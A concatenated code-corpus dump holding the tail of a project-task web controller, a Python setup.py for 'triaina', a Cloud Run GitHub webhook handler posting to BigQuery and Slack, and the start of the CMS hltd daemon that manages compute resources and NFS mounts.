s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
if not r.component and \
r.method != "import":
update_url = URL(args=["[id]"], vars=vars)
current.manager.crud.action_buttons(r,
update_url=update_url)
if not r.method in ("search", "report") and \
"form" in output:
# Insert fields to control the Project, Activity & Milestone
output = project_task_form_inject(r, output)
return output
s3.postp = postp
if "mine" in vars or \
"project" in vars:
hide_filter = True
else:
hide_filter = False
return current.rest_controller("project", "task",
rheader=s3db.project_rheader,
hide_filter=hide_filter,
)
# END =========================================================================
| mit | -3,539,949,038,401,025,500 | 40.930473 | 219 | 0.426801 | false | 5.143912 | false | false | false |
saxtouri/triaina | setup.py | 1 | 2483 | # Copyright (c) 2014, Stavros Sachtouris
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from setuptools import setup
import triaina
setup(
name='triaina',
version=triaina.__version__,
description=('A kamaki clone done differently'),
long_description=open('README.md').read(),
url='http://github.com/saxtouri/triaina',
download_url='https://github.com/saxtouri/triaina/archive/master.zip',
license='BSD',
author='Stavros Sachtouris',
author_email='[email protected]',
maintainer='Stavros Sachtouris',
maintainer_email='[email protected]',
packages=['triaina', ],
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Topic :: System :: Shells',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'
],
include_package_data=True,
entry_points={
},
install_requires=[]
)
| bsd-2-clause | 5,163,811,194,186,354,000 | 41.810345 | 80 | 0.712847 | false | 4.295848 | false | false | false |
GoogleCloudPlatform/serverless-expeditions | webhooks-with-cloud-run/Monolith/main.py | 1 | 5580 | # Copyright 2019 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hmac
import json
import os
import sys
import time
import urllib
from flask import Flask, request
from google.cloud import secretmanager_v1beta1
from hashlib import sha1
app = Flask(__name__)
@app.route("/", methods=["POST"])
def index():
signature = request.headers.get("X-Hub-Signature", None)
body = request.data
# Only process data with a valid signature
assert verify_signature(signature, body), "Unverified Signature"
# Load the event as JSON for easier handling
event = request.get_json(force=True)
# Insert row into bigquery
insert_row_into_bigquery(event)
# Post new issues to Slack
if event["action"] == "opened":
issue_title = event["issue"]["title"]
issue_url = event["issue"]["html_url"]
send_issue_notification_to_slack(issue_title, issue_url)
# Post response to Github
create_issue_comment(event["issue"]["url"])
print("Yay")
sys.stdout.flush()
return ("", 204)
def verify_signature(signature, body):
expected_signature = "sha1="
try:
# Get secret from Cloud Secret Manager
secret = get_secret(
os.environ.get("PROJECT_NAME"), os.environ.get("SECRET_NAME"), "1"
)
# Compute the hashed signature
hashed = hmac.new(secret, body, sha1)
expected_signature += hashed.hexdigest()
except Exception as e:
print(e)
return hmac.compare_digest(signature, expected_signature)
def send_issue_notification_to_slack(issue_title, issue_url):
# Sends a message to Slack Channel
msg = {
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": f"New issue created: <{issue_url}|{issue_title}>",
},
}
]
}
req = urllib.request.Request(
os.environ.get("SLACK_URL"),
data=json.dumps(msg).encode("utf8"),
headers={"Content-Type": "application/json"},
)
response = urllib.request.urlopen(req)
def insert_row_into_bigquery(event):
from google.cloud import bigquery
# Set up bigquery instance
client = bigquery.Client()
dataset_id = os.environ.get("DATASET")
table_id = os.environ.get("TABLE")
table_ref = client.dataset(dataset_id).table(table_id)
table = client.get_table(table_ref)
# Insert row
row_to_insert = [
(
event["issue"]["title"],
event["action"],
event["issue"]["html_url"],
time.time(),
)
]
bq_errors = client.insert_rows(table, row_to_insert)
# If errors, log to Stackdriver
if bq_errors:
entry = {
"severity": "WARNING",
"msg": "Row not inserted.",
"errors": bq_errors,
"row": row_to_insert,
}
print(json.dumps(entry))
def create_issue_comment(api_url):
# Posts an auto response to Github Issue
# Get tokens
pem = get_secret(os.environ.get("PROJECT_NAME"), os.environ.get("PEM"), "1")
app_token = get_jwt(pem)
installation_token = get_installation_token(app_token)
# Create Github issue comment via HTTP POST
try:
msg = {
"body": "Thank you for filing an issue. \
Someone will respond within 24 hours."
}
req = urllib.request.Request(
api_url + "/comments", data=json.dumps(msg).encode("utf8")
)
req.add_header("Authorization", f"Bearer {installation_token}")
response = urllib.request.urlopen(req)
except Exception as e:
print(e)
def get_jwt(pem):
# Encodes and returns JWT
from jwt import JWT, jwk_from_pem
payload = {
"iat": int(time.time()),
"exp": int(time.time()) + (10 * 60),
"iss": os.environ.get("APP_ID"),
}
jwt = JWT()
return jwt.encode(payload, jwk_from_pem(pem), "RS256")
def get_installation_token(jwt):
# Get App installation token to use Github API
req = urllib.request.Request(os.environ.get("INSTALLATION"), method="POST")
req.add_header("Authorization", f"Bearer {jwt}")
req.add_header("Accept", "application/vnd.github.machine-man-preview+json")
response = urllib.request.urlopen(req)
token_json = json.loads(response.read())
return token_json["token"]
def get_secret(project_name, secret_name, version_num):
# Returns secret payload from Cloud Secret Manager
client = secretmanager_v1beta1.SecretManagerServiceClient()
name = client.secret_version_path(project_name, secret_name, version_num)
secret = client.access_secret_version(name)
return secret.payload.data
if __name__ == "__main__":
PORT = int(os.getenv("PORT")) if os.getenv("PORT") else 8080
# This is used when running locally. Gunicorn is used to run the
# application on Cloud Run. See entrypoint in Dockerfile.
app.run(host="127.0.0.1", port=PORT, debug=True)
| apache-2.0 | -7,725,025,906,462,267,000 | 27.911917 | 80 | 0.624014 | false | 3.755047 | false | false | false |
dmitrijus/hltd | python/hltd.py | 1 | 148906 | #!/bin/env python
import os,sys
sys.path.append('/opt/hltd/python')
sys.path.append('/opt/hltd/lib')
import time
import datetime
import dateutil.parser
import logging
import subprocess
from signal import SIGKILL
from signal import SIGINT
import simplejson as json
#import SOAPpy
import threading
import CGIHTTPServer
import BaseHTTPServer
import cgitb
import httplib
import demote
import re
import shutil
import socket
#import fcntl
#import random
#modules distributed with hltd
import prctl
#modules which are part of hltd
from daemon2 import Daemon2
from hltdconf import *
from inotifywrapper import InotifyWrapper
import _inotify as inotify
from elasticbu import BoxInfoUpdater
from aUtils import fileHandler,ES_DIR_NAME
from setupES import setupES
thishost = os.uname()[1]
nthreads = None
nstreams = None
expected_processes = None
runList = None
bu_disk_list_ramdisk=[]
bu_disk_list_output=[]
bu_disk_list_ramdisk_instance=[]
bu_disk_list_output_instance=[]
bu_disk_ramdisk_CI = None
bu_disk_ramdisk_CI_instance = None
resource_lock = threading.Lock()
nsslock = threading.Lock()
suspended=False
entering_cloud_mode=False
exiting_cloud_mode=False
cloud_mode=False
abort_cloud_mode=False
cached_pending_run = None
resources_blocked_flag=False
disabled_resource_allocation=False
masked_resources=False
fu_watchdir_is_mountpoint=False
ramdisk_submount_size=0
machine_blacklist=[]
boxinfoFUMap = {}
boxdoc_version = 1
logCollector = None
q_list = []
num_excluded=0
dqm_globalrun_filepattern = '.run{0}.global'
def setFromConf(myinstance):
global conf
global logger
global idles
global used
global broken
global quarantined
global cloud
conf=initConf(myinstance)
idles = conf.resource_base+'/idle/'
used = conf.resource_base+'/online/'
broken = conf.resource_base+'/except/'
quarantined = conf.resource_base+'/quarantined/'
cloud = conf.resource_base+'/cloud/'
#prepare log directory
if myinstance!='main':
if not os.path.exists(conf.log_dir): os.makedirs(conf.log_dir)
if not os.path.exists(os.path.join(conf.log_dir,'pid')): os.makedirs(os.path.join(conf.log_dir,'pid'))
os.chmod(conf.log_dir,0777)
os.chmod(os.path.join(conf.log_dir,'pid'),0777)
logging.basicConfig(filename=os.path.join(conf.log_dir,"hltd.log"),
level=conf.service_log_level,
format='%(levelname)s:%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(os.path.basename(__file__))
conf.dump()
def preexec_function():
dem = demote.demote(conf.user)
dem()
prctl.set_pdeathsig(SIGKILL)
# os.setpgrp()
def cleanup_resources():
try:
dirlist = os.listdir(cloud)
for cpu in dirlist:
os.rename(cloud+cpu,idles+cpu)
dirlist = os.listdir(broken)
for cpu in dirlist:
os.rename(broken+cpu,idles+cpu)
dirlist = os.listdir(used)
for cpu in dirlist:
os.rename(used+cpu,idles+cpu)
dirlist = os.listdir(quarantined)
for cpu in dirlist:
os.rename(quarantined+cpu,idles+cpu)
dirlist = os.listdir(idles)
#quarantine files beyond use fraction limit (rounded to closest integer)
global num_excluded
num_excluded = int(round(len(dirlist)*(1.-conf.resource_use_fraction)))
for i in range(0,int(num_excluded)):
os.rename(idles+dirlist[i],quarantined+dirlist[i])
return True
except Exception as ex:
logger.warning(str(ex))
return False
def move_resources_to_cloud():
global q_list
dirlist = os.listdir(broken)
for cpu in dirlist:
os.rename(broken+cpu,cloud+cpu)
dirlist = os.listdir(used)
for cpu in dirlist:
os.rename(used+cpu,cloud+cpu)
dirlist = os.listdir(quarantined)
for cpu in dirlist:
os.rename(quarantined+cpu,cloud+cpu)
q_list=[]
dirlist = os.listdir(idles)
for cpu in dirlist:
os.rename(idles+cpu,cloud+cpu)
dirlist = os.listdir(idles)
for cpu in dirlist:
os.rename(idles+cpu,cloud+cpu)
def has_active_resources():
return len(os.listdir(broken))+len(os.listdir(used))+len(os.listdir(idles)) > 0
#interfaces to the cloud igniter script
def ignite_cloud():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'start'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode==0:
return True
else:
logger.error("cloud igniter start returned code "+str(proc.returncode))
if proc.returncode>1:
logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return False
def extinguish_cloud():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'stop'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode in [0,1]:
return True
else:
logger.error("cloud igniter stop returned "+str(proc.returncode))
if len(out):logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return False
def is_cloud_inactive():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'status'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode >1:
logger.error("cloud igniter status returned error code "+str(proc.returncode))
logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return 100
return proc.returncode
def umount_helper(point,attemptsLeft=3,initial=True):
if initial:
try:
logger.info('calling umount of '+point)
subprocess.check_call(['umount',point])
except subprocess.CalledProcessError, err1:
if err1.returncode<2:return True
if attemptsLeft<=0:
logger.error('Failed to perform umount of '+point+'. returncode:'+str(err1.returncode))
return False
logger.warning("umount failed, trying to kill users of mountpoint "+point)
try:
nsslock.acquire()
f_user = subprocess.Popen(['fuser','-km',os.path.join('/'+point,conf.ramdisk_subdirectory)],shell=False,preexec_fn=preexec_function,close_fds=True)
nsslock.release()
f_user.wait()
except:
try:nsslock.release()
except:pass
return umount_helper(point,attemptsLeft-1,initial=False)
else:
attemptsLeft-=1
time.sleep(.5)
try:
logger.info("trying umount -f of "+point)
subprocess.check_call(['umount','-f',point])
except subprocess.CalledProcessError, err2:
if err2.returncode<2:return True
if attemptsLeft<=0:
logger.error('Failed to perform umount -f of '+point+'. returncode:'+str(err2.returncode))
return False
return umount_helper(point,attemptsLeft,initial=False)
return True
def cleanup_mountpoints(remount=True):
global bu_disk_list_ramdisk
global bu_disk_list_ramdisk_instance
global bu_disk_list_output
global bu_disk_list_output_instance
global bu_disk_ramdisk_CI
global bu_disk_ramdisk_CI_instance
bu_disk_list_ramdisk = []
bu_disk_list_output = []
bu_disk_list_ramdisk_instance = []
bu_disk_list_output_instance = []
bu_disk_ramdisk_CI=None
bu_disk_ramdisk_CI_instance=None
if conf.bu_base_dir[0] == '/':
bu_disk_list_ramdisk = [os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory)]
bu_disk_list_output = [os.path.join(conf.bu_base_dir,conf.output_subdirectory)]
if conf.instance=="main":
bu_disk_list_ramdisk_instance = bu_disk_list_ramdisk
bu_disk_list_output_instance = bu_disk_list_output
else:
bu_disk_list_ramdisk_instance = [os.path.join(bu_disk_list_ramdisk[0],conf.instance)]
bu_disk_list_output_instance = [os.path.join(bu_disk_list_output[0],conf.instance)]
#make subdirectories if necessary and return
if remount==True:
try:
os.makedirs(os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory))
except OSError:
pass
try:
os.makedirs(os.path.join(conf.bu_base_dir,conf.output_subdirectory))
except OSError:
pass
return True
try:
process = subprocess.Popen(['mount'],stdout=subprocess.PIPE)
out = process.communicate()[0]
mounts = re.findall('/'+conf.bu_base_dir+'[0-9]+',out) + re.findall('/'+conf.bu_base_dir+'-CI/',out)
mounts = sorted(list(set(mounts)))
logger.info("cleanup_mountpoints: found following mount points: ")
logger.info(mounts)
umount_failure=False
for mpoint in mounts:
point = mpoint.rstrip('/')
umount_failure = umount_helper(os.path.join('/'+point,conf.ramdisk_subdirectory))==False
#only attempt this if first umount was successful
if umount_failure==False and not point.rstrip('/').endswith("-CI"):
umount_failure = umount_helper(os.path.join('/'+point,conf.output_subdirectory))==False
#this will remove directories only if they are empty (as unmounted mount point should be)
try:
if os.path.join('/'+point,conf.ramdisk_subdirectory)!='/':
os.rmdir(os.path.join('/'+point,conf.ramdisk_subdirectory))
except Exception as ex:
logger.exception(ex)
try:
if os.path.join('/'+point,conf.output_subdirectory)!='/':
if not point.rstrip('/').endswith("-CI"):
os.rmdir(os.path.join('/'+point,conf.output_subdirectory))
except Exception as ex:
logger.exception(ex)
if remount==False:
if umount_failure:return False
return True
i = 0
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
lines = []
with open(bus_config) as fp:
lines = fp.readlines()
if conf.mount_control_path and len(lines):
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
except OSError:
pass
try:
mountaddr = lines[0].split('.')[0]+'.cms'
#VM fallback
if lines[0].endswith('.cern.ch'): mountaddr = lines[0]
logger.info("found BU to mount (CI) at " + mountaddr)
except Exception as ex:
logger.fatal('Unable to parse bus.config file')
logger.exception(ex)
sys.exit(1)
attemptsLeft = 8
while attemptsLeft>0:
#by default ping waits 10 seconds
p_begin = datetime.datetime.now()
if os.system("ping -c 1 "+mountaddr)==0:
break
else:
p_end = datetime.datetime.now()
logger.warning('unable to ping '+mountaddr)
dt = p_end - p_begin
if dt.seconds < 10:
time.sleep(10-dt.seconds)
attemptsLeft-=1
if attemptsLeft==0:
logger.fatal('hltd was unable to ping BU '+mountaddr)
#check if bus.config has been updated
if (os.path.getmtime(bus_config) - busconfig_age)>1:
return cleanup_mountpoints(remount)
attemptsLeft=8
#sys.exit(1)
if True:
logger.info("trying to mount (CI) "+mountaddr+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_ramdisk,
mountaddr+':/fff/'+conf.ramdisk_subdirectory,
os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)
bu_disk_ramdisk_CI=toappend
if conf.instance=="main":
bu_disk_ramdisk_CI_instance = toappend
else:
bu_disk_ramdisk_CI_instance = os.path.join(toappend,conf.instance)
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount ramdisk - exiting.")
sys.exit(1)
busconfig_age = os.path.getmtime(bus_config)
for line in lines:
logger.info("found BU to mount at "+line.strip())
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
except OSError:
pass
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
except OSError:
pass
attemptsLeft = 8
while attemptsLeft>0:
#by default ping waits 10 seconds
p_begin = datetime.datetime.now()
if os.system("ping -c 1 "+line.strip())==0:
break
else:
p_end = datetime.datetime.now()
logger.warning('unable to ping '+line.strip())
dt = p_end - p_begin
if dt.seconds < 10:
time.sleep(10-dt.seconds)
attemptsLeft-=1
if attemptsLeft==0:
logger.fatal('hltd was unable to ping BU '+line.strip())
#check if bus.config has been updated
if (os.path.getmtime(bus_config) - busconfig_age)>1:
return cleanup_mountpoints(remount)
attemptsLeft=8
#sys.exit(1)
if True:
logger.info("trying to mount "+line.strip()+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_ramdisk,
line.strip()+':/fff/'+conf.ramdisk_subdirectory,
os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)
bu_disk_list_ramdisk.append(toappend)
if conf.instance=="main":
bu_disk_list_ramdisk_instance.append(toappend)
else:
bu_disk_list_ramdisk_instance.append(os.path.join(toappend,conf.instance))
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount ramdisk - exiting.")
sys.exit(1)
logger.info("trying to mount "+line.strip()+':/fff/'+conf.output_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_output,
line.strip()+':/fff/'+conf.output_subdirectory,
os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)
bu_disk_list_output.append(toappend)
if conf.instance=="main" or conf.instance_same_destination==True:
bu_disk_list_output_instance.append(toappend)
else:
bu_disk_list_output_instance.append(os.path.join(toappend,conf.instance))
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount output - exiting.")
sys.exit(1)
i+=1
#clean up suspended state
try:
if remount==True:os.popen('rm -rf '+conf.watch_directory+'/suspend*')
except:pass
except Exception as ex:
logger.error("Exception in cleanup_mountpoints")
logger.exception(ex)
if remount==True:
logger.fatal("Unable to handle (un)mounting")
return False
else:return False
def submount_size(basedir):
loop_size=0
try:
p = subprocess.Popen("mount", shell=False, stdout=subprocess.PIPE)
p.wait()
std_out=p.stdout.read().split("\n")
for l in std_out:
try:
ls = l.strip()
toks = l.split()
if toks[0].startswith(basedir) and toks[2].startswith(basedir) and 'loop' in toks[5]:
imgstat = os.stat(toks[0])
imgsize = imgstat.st_size
loop_size+=imgsize
except:pass
except:pass
return loop_size
def cleanup_bu_disks(run=None,cleanRamdisk=True,cleanOutput=True):
if cleanRamdisk:
if conf.watch_directory.startswith('/fff') and conf.ramdisk_subdirectory in conf.watch_directory:
logger.info('cleanup BU disks: deleting runs in ramdisk ...')
tries = 10
while tries > 0:
tries-=1
if run==None:
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/run*',shell=True)
else:
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/run'+str(run),shell=True)
p.wait()
if p.returncode==0:
logger.info('Ramdisk cleanup performed')
break
else:
logger.info('Failed ramdisk cleanup (return code:'+str(p.returncode)+') in attempt'+str(10-tries))
if cleanOutput:
outdirPath = conf.watch_directory[:conf.watch_directory.find(conf.ramdisk_subdirectory)]+conf.output_subdirectory
logger.info('outdirPath:'+ outdirPath + ' '+conf.output_subdirectory)
if outdirPath.startswith('/fff') and conf.output_subdirectory in outdirPath:
logger.info('cleanup BU disks: deleting runs in output disk ...')
tries = 10
while tries > 0:
tries-=1
if run==None:
p = subprocess.Popen("rm -rf " + outdirPath+'/run*',shell=True)
else:
p = subprocess.Popen("rm -rf " + outdirPath+'/run'+str(run),shell=True)
p.wait()
if p.returncode==0:
logger.info('Output cleanup performed')
break
else:
logger.info('Failed output disk cleanup (return code:'+str(p.returncode)+') in attempt '+str(10-tries))
def calculate_threadnumber():
global nthreads
global nstreams
global expected_processes
idlecount = len(os.listdir(idles))
if conf.cmssw_threads_autosplit>0:
nthreads = idlecount/conf.cmssw_threads_autosplit
nstreams = idlecount/conf.cmssw_threads_autosplit
if nthreads*conf.cmssw_threads_autosplit != nthreads:
logger.error("idle cores can not be evenly split to cmssw threads")
else:
nthreads = conf.cmssw_threads
nstreams = conf.cmssw_streams
expected_processes = idlecount/nstreams
def updateBlacklist(blfile):
black_list=[]
active_black_list=[]
#TODO:this will be updated to read blacklist from database
if conf.role=='bu':
try:
if os.stat(blfile).st_size>0:
with open(blfile,'r') as fi:
try:
static_black_list = json.load(fi)
for item in static_black_list:
black_list.append(item)
logger.info("found these resources in " + blfile + " : " + str(black_list))
except ValueError:
logger.error("error parsing /etc/appliance/blacklist")
except:
#no blacklist file, this is ok
pass
black_list=list(set(black_list))
try:
forceUpdate=False
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
active_black_list = json.load(fi)
except:
forceUpdate=True
if forceUpdate==True or active_black_list != black_list:
try:
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'w') as fi:
json.dump(black_list,fi)
except:
return False,black_list
#TODO:check on FU if blacklisted
return True,black_list
def restartLogCollector(instanceParam):
global logCollector
if logCollector!=None:
logger.info("terminating logCollector")
logCollector.terminate()
logCollector = None
logger.info("starting logcollector.py")
logcollector_args = ['/opt/hltd/python/logcollector.py']
logcollector_args.append(instanceParam)
logCollector = subprocess.Popen(logcollector_args,preexec_fn=preexec_function,close_fds=True)
class system_monitor(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.running = True
self.hostname = os.uname()[1]
self.directory = []
self.file = []
self.rehash()
self.create_file=True
self.threadEvent = threading.Event()
self.threadEventStat = threading.Event()
self.statThread = None
self.stale_flag=False
self.boxdoc_version = boxdoc_version
if conf.mount_control_path:
self.startStatNFS()
def rehash(self):
if conf.role == 'fu':
self.check_directory = [os.path.join(x,'appliance','dn') for x in bu_disk_list_ramdisk_instance]
#write only in one location
if conf.mount_control_path:
logger.info('Updating box info via control interface')
self.directory = [os.path.join(bu_disk_ramdisk_CI_instance,'appliance','boxes')]
else:
logger.info('Updating box info via data interface')
self.directory = [os.path.join(bu_disk_list_ramdisk_instance[0],'appliance','boxes')]
self.check_file = [os.path.join(x,self.hostname) for x in self.check_directory]
else:
self.directory = [os.path.join(conf.watch_directory,'appliance/boxes/')]
try:
#if directory does not exist: check if it is renamed to specific name (non-main instance)
if not os.path.exists(self.directory[0]) and conf.instance=="main":
os.makedirs(self.directory[0])
except OSError:
pass
self.file = [os.path.join(x,self.hostname) for x in self.directory]
logger.info("system_monitor: rehash found the following BU disk(s):"+str(self.file))
for disk in self.file:
logger.info(disk)
def startStatNFS(self):
if conf.role == "fu":
self.statThread = threading.Thread(target = self.runStatNFS)
self.statThread.start()
def runStatNFS(self):
fu_stale_counter=0
fu_stale_counter2=0
while self.running:
if conf.mount_control_path:
self.threadEventStat.wait(2)
time_start = time.time()
err_detected = False
try:
#check for NFS stale file handle
for disk in bu_disk_list_ramdisk:
mpstat = os.stat(disk)
for disk in bu_disk_list_output:
mpstat = os.stat(disk)
if bu_disk_ramdisk_CI:
disk = bu_disk_ramdisk_CI
mpstat = os.stat(disk)
#no issue if we reached this point
fu_stale_counter = 0
except (IOError,OSError) as ex:
err_detected=True
if ex.errno == 116:
if fu_stale_counter==0 or fu_stale_counter%500==0:
logger.fatal('detected stale file handle: '+str(disk))
else:
logger.warning('stat mountpoint ' + str(disk) + ' caught Error: '+str(ex))
fu_stale_counter+=1
err_detected=True
except Exception as ex:
err_detected=True
logger.warning('stat mountpoint ' + str(disk) + ' caught exception: '+str(ex))
#if stale handle checks passed, check if write access and timing are normal
#for all data network ramdisk mountpoints
if conf.mount_control_path and not err_detected:
try:
for mfile in self.check_file:
with open(mfile,'w') as fp:
fp.write('{}')
fu_stale_counter2 = 0
#os.stat(mfile)
except IOError as ex:
err_detected = True
fu_stale_counter2+=1
if ex.errno==2:
#still an error if htld on BU did not create 'appliance/dn' dir
if fu_stale_counter2==0 or fu_stale_counter2%20==0:
logger.warning('unable to update '+mfile+ ' : '+str(ex))
else:
logger.error('update file ' + mfile + ' caught Error:'+str(ex))
except Exception as ex:
err_detected = True
logger.error('update file ' + mfile + ' caught exception:'+str(ex))
#measure time needed to do these actions. stale flag is set if it takes more than 10 seconds
stat_time_delta = time.time()-time_start
if stat_time_delta>5:
if conf.mount_control_path:
logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform file handle and boxinfo stat check")
else:
logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform stale file handle check")
if stat_time_delta>5 or err_detected:
self.stale_flag=True
else:
#clear stale flag if successful
self.stale_flag=False
#no loop if called inside main loop
if not conf.mount_control_path:
return
def run(self):
try:
logger.debug('entered system monitor thread ')
global suspended
global ramdisk_submount_size
global masked_resources
res_path_temp = os.path.join(conf.watch_directory,'appliance','resource_summary_temp')
res_path = os.path.join(conf.watch_directory,'appliance','resource_summary')
selfhost = os.uname()[1]
boxinfo_update_attempts=0
counter=0
while self.running:
self.threadEvent.wait(5 if counter>0 else 1)
counter+=1
counter=counter%5
if suspended:continue
tstring = datetime.datetime.utcfromtimestamp(time.time()).isoformat()
ramdisk = None
if conf.role == 'bu':
ramdisk = os.statvfs(conf.watch_directory)
ramdisk_occ=1
try:ramdisk_occ = float((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)/float(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)
except:pass
if ramdisk_occ<0:
ramdisk_occ=0
logger.info('incorrect ramdisk occupancy',ramdisk_occ)
if ramdisk_occ>1:
ramdisk_occ=1
logger.info('incorrect ramdisk occupancy',ramdisk_occ)
#init
resource_count_idle = 0
resource_count_used = 0
resource_count_broken = 0
resource_count_quarantined = 0
resource_count_stale = 0
resource_count_pending = 0
resource_count_activeRun = 0
cloud_count = 0
lastFURuns = []
lastFUrun=-1
activeRunQueuedLumisNum = -1
activeRunCMSSWMaxLumi = -1
active_res = 0
fu_data_alarm=False
current_time = time.time()
stale_machines = []
try:
current_runnumber = runList.getLastRun().runnumber
except:
current_runnumber=0
for key in boxinfoFUMap:
if key==selfhost:continue
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:continue #deleted?
if current_time - etime > 10 or edata == None: continue
try:
try:
if edata['version']!=self.boxdoc_version:
logger.warning('box file version mismatch from '+str(key)+' got:'+str(edata['version'])+' required:'+str(self.boxdoc_version))
continue
except:
logger.warning('box file version for '+str(key)+' not found')
continue
if edata['detectedStaleHandle']:
stale_machines.append(str(key))
resource_count_stale+=edata['idles']+edata['used']+edata['broken']
else:
if current_runnumber in edata['activeRuns']:
resource_count_activeRun += edata['used_activeRun']+edata['broken_activeRun']
active_addition =0
if edata['cloudState'] == "resourcesReleased":
resource_count_pending += edata['idles']
else:
resource_count_idle+=edata['idles']
active_addition+=edata['idles']
active_addition+=edata['used']
resource_count_used+=edata['used']
resource_count_broken+=edata['broken']
resource_count_quarantined+=edata['quarantined']
#active resources reported to BU if cloud state is off
if edata['cloudState'] == "off":
active_res+=active_addition
cloud_count+=edata['cloud']
fu_data_alarm = edata['fuDataAlarm'] or fu_data_alarm
except Exception as ex:
logger.warning('problem updating boxinfo summary: '+str(ex))
try:
lastFURuns.append(edata['activeRuns'][-1])
except:pass
if len(stale_machines) and counter==1:
logger.warning("detected stale box resources: "+str(stale_machines))
fuRuns = sorted(list(set(lastFURuns)))
if len(fuRuns)>0:
lastFUrun = fuRuns[-1]
#second pass
for key in boxinfoFUMap:
if key==selfhost:continue
try:
